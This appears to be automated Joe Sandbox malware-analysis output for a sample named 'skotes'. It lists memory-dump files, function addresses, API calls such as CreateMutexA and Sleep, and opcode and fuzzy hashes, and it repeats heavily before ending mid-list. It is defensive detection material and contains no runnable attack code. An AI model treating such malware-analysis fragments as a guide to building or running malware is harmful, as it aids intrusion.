Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 36c5567b3c56686936391e18360e621b308c4ecdbf802695c5de60a5c923211d
Instruction ID: ddeef9d74b2d668e7b9afdf7d1b65da40df286b3764d0bf47fa517f2d17dab1e
Opcode Fuzzy Hash: 36c5567b3c56686936391e18360e621b308c4ecdbf802695c5de60a5c923211d
Instruction Fuzzy Hash: 88312771644104ABFB18ABB8DC89B6DB772EB85310F24821AE014972D6D73DA9808762

Function 00789ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 3ede7c9beafa654ee2bae42cb48b56160ebca2176a5d7fc82a7c1a360d5f1861
Instruction ID: 0b20ce23f0192fb179ed40a2a6c04c0eaa00e23be290a2aba6b55bf1369c2945
Opcode Fuzzy Hash: 3ede7c9beafa654ee2bae42cb48b56160ebca2176a5d7fc82a7c1a360d5f1861
Instruction Fuzzy Hash: A2213A71644200ABFB18BBACECC976DB765EBC5310F24822EE544C72D1D77DA9408712

Function 0078A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 537e4e25eb2d33c599f345f7602e1e718a3e8c4610dc175c6c5f88858b28c275
Instruction ID: 1e1703121da7f59fb4fe27157332e3ac8792e45e4d1fd6e801a9fd1520006876
Opcode Fuzzy Hash: 537e4e25eb2d33c599f345f7602e1e718a3e8c4610dc175c6c5f88858b28c275
Instruction Fuzzy Hash: CC212B713C9100EAFB2977AC988EB2DB7619F91300F24441BE144D72D1DA7EA9818373

Function 0078A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: c43d4e9616fb0b0c2c8efa36f5d99a14b4bab49597b3d632fa254a9a2a4e3503
Instruction ID: edaab5dd49f20d553eaba519f6532e4126a18b391a78922b5b0b0e6e7c2e27a9
Opcode Fuzzy Hash: c43d4e9616fb0b0c2c8efa36f5d99a14b4bab49597b3d632fa254a9a2a4e3503
Instruction Fuzzy Hash: 27213D31684200ABFB18BB6CEC8976DB775DBD5310F24812EE444D76D1D77EA5808352

Function 007BD82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007BA813,00000001,00000364,00000006,000000FF,?,007BEE3F,?,00000004,00000000,?,?), ref: 007BD870

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 832214f4bdea32e57548c8147dd9765634ba2fea37819d3877a466926312691f
Instruction ID: 0a43c6ccd141d0612e2e6ff7268a44ffffa8c57c2c7ee50c337d6d6f482bfd2b
Opcode Fuzzy Hash: 832214f4bdea32e57548c8147dd9765634ba2fea37819d3877a466926312691f
Instruction Fuzzy Hash: 84F02732605124A6EB312A76DC05BDB3759DF817B2B288021FD08EB191FA2CEC0086E1

Non-executed Functions

Function 007BCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 007BCC66

Strings

v{, xrefs: 007BCBE1

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: v{
API String ID: 3213747228-1518592600
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: 77ac5c4256ab6070df1f60937f3493894eb0182b6ea6c90476419967f83aec47
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: D7B10532A04686DFDB16CF28C885BEEBFE5EF55350F14816AE855EB242D6389D01CB60

Function 00782EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00782F5F
__Mtx_unlock.LIBCPMT ref: 00782FCC
__Cnd_broadcast.LIBCPMT ref: 00782FE3
__Mtx_unlock.LIBCPMT ref: 007830F5
__Mtx_unlock.LIBCPMT ref: 0078319B

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
